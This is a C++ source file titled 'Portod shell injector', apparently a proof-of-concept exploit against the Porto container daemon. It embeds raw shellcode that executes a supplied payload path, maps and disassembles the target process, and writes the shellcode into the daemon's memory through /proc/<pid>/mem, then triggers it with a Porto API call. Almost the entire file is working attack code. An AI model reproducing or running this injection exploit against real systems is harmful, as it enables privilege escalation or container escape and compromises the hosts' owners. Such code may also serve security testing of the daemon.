#include <cerrno>
#include <cstdio>
#include <wait.h>

#include <util/generic/string.h>
#include <util/string/cast.h>
#include <util/string/builder.h>
#include <util/string/split.h>
#include <util/generic/strbuf.h>
#include <util/stream/file.h>
#include <util/system/shellcommand.h>
#include <library/cpp/getopt/last_getopt.h>
#include <infra/porto/api/libporto.hpp>


TString gen_shellcode(const TString& helperPath) {
    TStringBuilder out;
    out
        << "\x31\xc0\x50\x48\x8b\x14\x24\xeb\x10\x54"
           "\x78\x06\x5e\x5f\xb0\x3b\x0f\x05\x59\x5b"
           "\x40\xb0\x0b\xcd\x80\xe8\xeb\xff\xff\xff"sv
        << helperPath
        << "\x00\x00\x00\x00"
           "\x44\x45\x41\x44\x42\x45\x41\x46"
           "\x00\x00\x00\x00"sv;

    return out;
}

void get_maps(int targetPid) {
    Cout << "Waiting process " << targetPid << Endl;

    auto proc_path = TString("/proc/") + ToString(targetPid) + "/maps";
    int fd = -1;
    while (fd == -1) {
        fd = open(proc_path.c_str(), O_RDONLY);
    }

    char buf[1024];
    int buflen;
    while ((buflen = read(fd, buf, 1024)) > 0) {
        write(1, buf, buflen);
    }
    close(fd);
}

void run_objdump(int targetPid) {
    Cout << "Waiting process " << targetPid << Endl;

    auto proc_path = TString("/proc/") + ToString(targetPid) + "/exe";
    int fd = -1;
    while (fd == -1) {
        fd = open(proc_path.c_str(), O_RDONLY);
    }

    TShellCommandOptions opts;
    opts.SetOutputStream(&Cout);
    opts.SetErrorStream(&Cerr);

    TShellCommand cmd("objdump", {"--prefix-addresses", "-d", TString("/proc/self/fd/") + ToString(fd)}, opts);
    cmd.Run().Wait();
    close(fd);
}

void do_inject(int targetPid, ui64 offset, const TString& helperPath) {
    Cout << "Waiting process " << targetPid << Endl;

    auto shell_code = gen_shellcode(helperPath);

    auto proc_path = TString("/proc/") + ToString(targetPid) + "/mem";
    int fd = -1;
    while (fd == -1) {
        fd = open(proc_path.c_str(), O_SYNC | O_WRONLY);
    }

    if (!lseek64(fd, offset, SEEK_SET)) {
        throw yexception() << "fseek failed: " << strerror(errno);
    }

    if (!write(fd, shell_code.Data(), shell_code.Size())) {
        throw yexception() << "fwrite failed: " << strerror(errno);
    }

    Cout << "Probable shellcode writen" << Endl;
    close(fd);
}

int main(int argc, char** argv) {
    using namespace NLastGetopt;
    TOpts opts = TOpts::Default();

    opts.SetTitle("Portod shell injector");

    TString offset;
    opts.AddLongOption("offset", "memory offset")
        .StoreResult(&offset);

    TString action;
    opts.AddLongOption("action", "target action (inject,mmap,objdump)")
        .DefaultValue("inject")
        .StoreResult(&action);

    opts.SetFreeArgsMax(1);
    opts.SetFreeArgTitle(0, "/path/to/payload");

    TOptsParseResult args(&opts, argc, argv);

    int targetPid = getpid() + 2;
    Cout << "Wait for portod with pid " << targetPid << Endl;
    int pid = fork();
    if (pid > 0) {
        if (action == "inject") {
            do_inject(
                targetPid,
                IntFromString<ui64, 16>(offset),
                args.GetFreeArgs()[0]
            );
        } else if (action == "mmap") {
            get_maps(targetPid);
        } else if (action == "objdump") {
            run_objdump(targetPid);
        } else {
            throw yexception() << "unknown action: " << action;
        }

        _exit(0);
    } else {
        sleep(1);
        Porto::TPortoApi api;
        TString _ = "";
        auto call_result = api.LocateProcess(getpid(), _, _);
        if (call_result != Porto::EError::Success) {
            Cout << "Oh,oh,oh! Seems payload executed!" << Endl;
        }
    }

    waitpid(pid, nullptr, 0);
}
